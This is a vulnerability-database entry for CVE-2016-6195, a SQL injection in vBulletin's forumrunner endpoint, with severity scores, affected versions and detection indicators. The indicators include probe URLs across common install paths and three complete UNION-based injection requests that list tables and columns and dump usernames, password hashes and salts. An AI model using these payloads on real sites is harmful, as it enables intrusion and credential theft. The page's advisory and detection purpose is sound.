cbcvebase.
CVE-2016-6195
published 2016-08-30

CVE-2016-6195: SQL injection vulnerability in forumrunner/includes/moderation.php in vBulletin before 4.2.2 Patch Level 5 and 4.2.3 before Patch Level 1 allows remote…

PriorityP187critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
68.49%
99.2th percentile
SQL injection vulnerability in forumrunner/includes/moderation.php in vBulletin before 4.2.2 Patch Level 5 and 4.2.3 before Patch Level 1 allows remote attackers to execute arbitrary SQL commands via the postids parameter to forumrunner/request.php, as exploited in the wild in July 2016.

Affected

2 ranges
VendorProductVersion rangeFixed in
vbulletinvbulletin<= 4.2.2
vbulletinvbulletin

Detection & IOCsextracted from sources · hover to see the quote

path/forumrunner/request.php
path/forumrunner/includes/moderation.php
url{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
commandGET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- -
commandGET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name=0x75736572) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- -
commandGET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- -
  • HTTP response body containing 'type=dberror' indicates successful SQL injection triggering a database error in vBulletin forumrunner.
  • Probe multiple common vBulletin install sub-paths for forumrunner/request.php with a broken postids value (e.g., -1') to detect the vulnerable endpoint.
  • Shodan/FOFA fingerprinting: identify vBulletin instances via page title or HTML body containing 'powered by vbulletin' before targeting the forumrunner endpoint.
  • The SQL injection entry point is the 'postids' GET parameter in the 'get_spam_data' command of forumrunner/request.php; monitor for UNION-based payloads or unbalanced quotes in this parameter.
  • HTTP 200 or 503 response status combined with 'type=dberror' in the body confirms exploitation attempt triggered a DB error response.
  • ·Vulnerability affects vBulletin 3.6.0 through 4.2.3; versions 4.2.2 Patch Level 5+ and 4.2.3 Patch Level 1+ are patched. Scope detection efforts to this version range.
  • ·This vulnerability was actively exploited in the wild as of July 2016; treat any unpatched vBulletin 3.6.0–4.2.3 instance as high-priority.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.